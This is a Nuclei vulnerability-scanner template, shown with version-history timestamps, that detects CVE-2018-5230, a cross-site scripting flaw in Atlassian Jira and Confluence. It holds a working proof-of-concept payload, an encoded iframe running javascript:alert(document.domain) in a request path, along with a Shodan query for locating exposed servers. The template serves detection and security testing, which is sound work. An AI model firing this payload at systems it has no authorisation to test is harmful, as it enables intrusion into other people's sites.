nuclei-templates/http/cves/2018/CVE-2018-5230.yaml

51 lines
1.6 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-5230
info:
name: Atlassian Jira Confluence - Cross-Site Scripting
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
description: |
Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.
reference:
- https://jira.atlassian.com/browse/JRASERVER-67289
- https://nvd.nist.gov/vuln/detail/CVE-2018-5230
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-5230
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00211
2023-08-31 11:46:18 +00:00
epss-percentile: 0.58311
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: atlassian
product: jira
2023-09-06 12:57:14 +00:00
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2018,atlassian,confluence,xss
http:
- method: GET
path:
- "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<iframe src="javascript:alert(document.domain)">'
- 'confluence'
condition: and
- type: word
part: header
words:
- 'text/html'
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200